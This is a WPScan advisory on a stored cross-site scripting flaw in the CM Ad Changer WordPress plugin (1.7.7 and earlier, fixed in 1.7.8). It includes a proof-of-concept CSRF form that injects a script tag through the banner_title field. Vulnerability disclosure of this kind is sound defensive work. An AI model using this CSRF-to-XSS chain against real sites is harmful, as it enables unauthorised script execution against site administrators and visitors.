CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link (CSRF) which can trigger the Stored XSS.
Proof of Concept
1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings, in the next tab "Campaign Banners", select an Image in Campaign images and in Banner Title enter this payload

3) Enter Save & Payload triggers everytime you Return.

Attacker Can Make a Payload File containing the following:

    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="{TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />

This will Trigger Stored XSS at banner_title Parameter.

Affects Plugin

fixed in version 1.7.8




Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)


Submitter Aaditya Purani
Submitter Website
Submitter Twitter aaditya_purani
Views 188
Verified No


Publicly Published 2016-06-09 (about 2 years ago)
Added 2016-06-13 (about 2 years ago)
Last Updated 2016-06-13 (about 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.